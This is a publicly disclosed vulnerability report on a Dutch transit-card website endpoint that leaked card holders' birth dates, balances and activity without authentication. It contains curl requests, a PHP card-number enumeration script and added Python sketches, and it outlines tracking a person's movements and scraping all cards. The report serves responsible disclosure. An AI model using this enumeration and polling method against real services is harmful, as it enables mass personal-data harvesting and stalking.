Personal data of all Dutch public transport cards ("OV-Chipkaart") accessible
State Resolved (Closed)
Disclosed publicly 2018-09-11T22:52:47.136Z
Reported To
Weakness none
Bounty
Summary by bandjes

On December 19, 2017, Tweakers.net published an article about a publicly accessible form that shows the balance and the date of last activity of any public transport card number you enter. Shortly after the article was published, a comment on it stated that the card owner's date of birth was also available via the webshop of the Dutch railway company (NS). This caught my attention, because it suggested that much more information than just the balance and last activity date was available via a publicly accessible endpoint on the web.

Let's do some digging

Following the information in the Tweakers.net article, I started looking around on the page that hosts the publicly accessible balance check form. Via the network tab of the developer tools, I noticed that each request has to pass a Google reCAPTCHA check, with the token sent in an HTTP header. Leaving this header out resulted in an error message ("Onjuiste recaptcha token", Dutch for "Incorrect reCAPTCHA token"):

curl 'https://www.ov-chipkaart.nl/api/medium/v1/saldocheckerpagedata' \
  -H 'Host: www.ov-chipkaart.nl' \
  -H 'User-Agent: (...)' \
  -H 'Referer: https://www.ov-chipkaart.nl/saldo-terugvragen/saldochecker.htm' \
  -H 'Content-Type: application/json' \
  -H 'Origin: https://www.ov-chipkaart.nl' \
  --data '{"mediumId":"352802080********"}'
{
  "errorCode": 120,
  "message": "Onjuiste recaptcha token."
}

This endpoint was not of much use. I decided to log in to my personal account and watch the network traffic in the developer console while clicking through the dashboard. One request caught my attention: https://www.ov-chipkaart.nl/web/medium_information. This POST request, sent with the parameters hashedMediumId and languagecode, returned exactly what I was looking for:

curl 'https://www.ov-chipkaart.nl/web/medium_information' \
  -H 'Host: www.ov-chipkaart.nl' \
  -H 'User-Agent: (...)' \
  -H 'Referer: https://www.ov-chipkaart.nl/mijn-ov-chip/mijn-ov-reishistorie.htm?mediumid=(...)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: https://www.ov-chipkaart.nl' \
  -H 'Cookie: (...)' \
  -H 'X-Requested-With: XMLHttpRequest' \
  --data 'hashedMediumId=(...)&languagecode=nl-NL'
{
  "dateOfBirth": "01-01-1970",
  "ePurseRemainingAmount": 13.37,
  "expiryDate": "01-01-2022",
  "isAutoReloadActive": false,
  "lastActivityTime": "01-01-2017 13:37",
  "locale": "nl_NL",
  "localeEPurseRemainingAmount": "€ 13,37",
  "mediumId": "35280208********",
  "mediumStatus": "Active",
  "mediumStatusDescription": "Actief",
  "mediumType": "Anonymous",
  "mediumTypeDescription": "Anonieme OV-chipkaart"
}
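To make the sensitivity of this response concrete, the following is a minimal Python sketch (not part of the original research) that parses a response of this shape into typed fields. The class name MediumInfo and the function parse_medium_info are hypothetical, and the day-month-year date format is an assumption based on Dutch convention; the sample values are the placeholder values shown above.

```python
import json
from dataclasses import dataclass
from datetime import date, datetime


@dataclass
class MediumInfo:
    """Hypothetical container for a subset of the fields in the response."""
    medium_id: str
    medium_type: str
    balance: float
    date_of_birth: date
    last_activity: datetime


def parse_medium_info(raw: str) -> MediumInfo:
    """Parse the JSON body; date formats are assumed to be day-month-year."""
    data = json.loads(raw)
    return MediumInfo(
        medium_id=data["mediumId"],
        medium_type=data["mediumType"],
        balance=data["ePurseRemainingAmount"],
        date_of_birth=datetime.strptime(data["dateOfBirth"], "%d-%m-%Y").date(),
        last_activity=datetime.strptime(data["lastActivityTime"], "%d-%m-%Y %H:%M"),
    )


# Placeholder values copied from the example response in the report.
SAMPLE = """{
  "dateOfBirth": "01-01-1970",
  "ePurseRemainingAmount": 13.37,
  "lastActivityTime": "01-01-2017 13:37",
  "mediumId": "35280208********",
  "mediumType": "Anonymous"
}"""

info = parse_medium_info(SAMPLE)
print(info)
```

Even for a card typed as "Anonymous", the response pairs a date of birth with a balance and a last activity timestamp.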

The only odd thing about this request was the parameter hashedMediumId. Where did its value come from, and how was it calculated? Unfortunately, I could not find anything about the hashing method in the resources of the page. A dead end. A bit disappointed, I looked at the request again and, in a desperate attempt, replaced the parameter hashedMediumId with just mediumId. Laughing at the idea that this would ever work, I filled in a plain medium ID, 35280208********, pressed the return key, and the exact same result came back!

Let the fun begin

Having found this endpoint, I removed the cookie header from my cURL request and tried again. The same result came back, meaning the request required no authentication and could be used to retrieve the data of any existing card number.

To confirm this, I generated a list of possible card numbers, all starting with 35280200. To rule out a large share of invalid numbers up front, I looked up the validation algorithm behind the OV-Chipkaart. Finding it wasn’t hard, since the JavaScript validation method in the forms was called luhnCheck. The algorithm is therefore the Luhn algorithm, a modulo 10 checksum that is also used for IMEI numbers and credit card numbers, among others. To generate the list, I wrote the following PHP snippet:

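<?php

// Returns true when $number passes the Luhn (modulo 10) check.
function luhnCheck($number) {
    $number = (string) $number;
    $l = strlen($number);
    $n = $o = 0; // $n selects the lookup row, $o is the running sum
    // Row 0 maps a digit to itself; row 1 maps it to the digit sum of its double.
    $r = [
        [0,1,2,3,4,5,6,7,8,9],
        [0,2,4,6,8,1,3,5,7,9],
    ];

    // Walk the digits from right to left, alternating between the two rows.
    for ($t = $l; $t--; ) {
        // Square brackets: the $number{$t} offset syntax was removed in PHP 8.
        $o += $r[$n][(int) $number[$t]];
        $n ^= 1;
    }

    return $o % 10 === 0 && $o > 0;
}

$fh = fopen(__DIR__ . DIRECTORY_SEPARATOR . 'numbers.txt', 'a+');
$prefix = 35280200;

// Try every 8-digit suffix and keep the 16-digit numbers that pass the check.
for ($i = 0; $i < 100000000; $i++) {
    $number = sprintf('%d%08d', $prefix, $i);

    if (luhnCheck($number)) {
        fwrite($fh, $number . PHP_EOL);
    }
}

fclose($fh);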
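As a cross-check of the approach, here is a small Python sketch of the same Luhn check, plus a helper that computes the check digit directly. The function names luhn_valid and luhn_check_digit are my own, not taken from the OV-chipkaart site. Because every stem of digits has exactly one valid check digit, one in ten candidates passes; the arithmetic at the end assumes 16 digits plus a single newline byte per line.

```python
def luhn_valid(number: str) -> bool:
    """Return True if the digit string passes the Luhn (mod 10) check."""
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:      # every second digit from the right is doubled
            d *= 2
            if d > 9:       # same as summing the two digits of the product
                d -= 9
        total += d
    return total > 0 and total % 10 == 0


def luhn_check_digit(stem: str) -> int:
    """Return the digit that makes stem + digit pass the Luhn check."""
    total = 0
    for i, ch in enumerate(reversed(stem)):
        d = int(ch)
        if i % 2 == 0:      # these positions are doubled once a digit is appended
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return (10 - total % 10) % 10


# Scaled-down version of the enumeration: 4-digit suffixes instead of 8.
prefix = "35280200"
valid_small = sum(luhn_valid(f"{prefix}{i:04d}") for i in range(10_000))
print(valid_small)  # one valid number per 3-digit stem

# Expected size of the full list under the stated assumptions.
expected_count = 10**8 // 10          # one in ten candidates is valid
expected_bytes = expected_count * 17  # 16 digits + newline
print(expected_count, expected_bytes)
```

The helper also shows that the full list could be built without testing every candidate: generating each 7-digit stem and appending its check digit yields the same set of numbers in a tenth of the iterations.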

The script produced a 170 MB file containing 10 million card numbers. Next, I picked 5 random numbers:

rl -c 5 numbers.txt

… and tried all of them against the endpoint. All requests were successful and returned the same data structure as I had received for my own card number.
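Where the rl tool is not available, the random selection step can be approximated in a few lines of Python. This is a sketch using reservoir sampling, so the 170 MB file never has to be loaded into memory at once; the function name sample_lines is hypothetical, and the demo runs on an in-memory list rather than on numbers.txt.

```python
import random
from typing import Iterable, List


def sample_lines(lines: Iterable[str], k: int, rng: random.Random) -> List[str]:
    """Pick k lines uniformly at random in a single pass (reservoir sampling)."""
    reservoir: List[str] = []
    for index, line in enumerate(lines):
        item = line.rstrip("\n")
        if index < k:
            # Fill the reservoir with the first k lines.
            reservoir.append(item)
        else:
            # Replace an existing entry with probability k / (index + 1).
            j = rng.randint(0, index)
            if j < k:
                reservoir[j] = item
    return reservoir


# Stand-in data; with the real file one would pass an open file handle instead:
#     with open("numbers.txt") as fh:
#         picked = sample_lines(fh, 5, random.Random())
candidates = [f"{i:04d}\n" for i in range(1000)]
picked = sample_lines(candidates, 5, random.Random())
print(picked)
```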

Impact

The impact of this publicly accessible endpoint is huge. I will give three scenarios, but there are many more ways this data could be abused.

  1. Querying the data of one specific OV-Chipkaart every minute over a period of a month would give me good insight into the daily schedule of its user. Calculating the difference in the card’s balance between queries can give me an indication of where the user lives and travels to, since the fares for each route are pretty specific.
  2. Fetching the data of all possible card numbers gives me a nice insight into the average user. I could make charts of the average age of all users, the average balance, the most common card type, and the total amount of money still available on cards.
  3. Using this form would give me the opportunity to reclaim the balance (max. € 20,-) of anonymous cards that expired less than a year ago.
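The reasoning behind the first scenario can be sketched in Python as follows. The observations are invented values for illustration only, not data retrieved from the endpoint, and balance_changes is a hypothetical helper: it compares consecutive polls and reports each moment at which the balance changed.

```python
from datetime import datetime
from typing import List, Tuple

Observation = Tuple[datetime, float]  # (time of poll, balance in euros)


def balance_changes(observations: List[Observation]) -> List[Tuple[datetime, float]]:
    """Return (time, delta) for every poll whose balance differs from the previous one."""
    changes = []
    for (_, previous), (seen_at, current) in zip(observations, observations[1:]):
        delta = round(current - previous, 2)  # round away floating point noise
        if delta != 0:
            changes.append((seen_at, delta))
    return changes


# Invented sample data: four polls of one card on a single morning.
polls = [
    (datetime(2017, 1, 2, 8, 0), 13.37),
    (datetime(2017, 1, 2, 8, 1), 13.37),
    (datetime(2017, 1, 2, 8, 2), 9.37),
    (datetime(2017, 1, 2, 8, 40), 11.07),
]

for seen_at, delta in balance_changes(polls):
    print(seen_at.isoformat(), delta)
```

Each non-zero change marks card activity between two polls, and the size of the change is what would have to be matched against published fares.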

Timeline
bandjes submitted a report to OV-chipkaart.
2017-12-19T20:42:30.000Z

███████████████████████████████

Regards,
Frans

bandjes Activities::BugResolved
2017-12-19T20:42:30.000Z


bandjes Activities::ReportBecamePublic
2018-09-11T22:52:47.229Z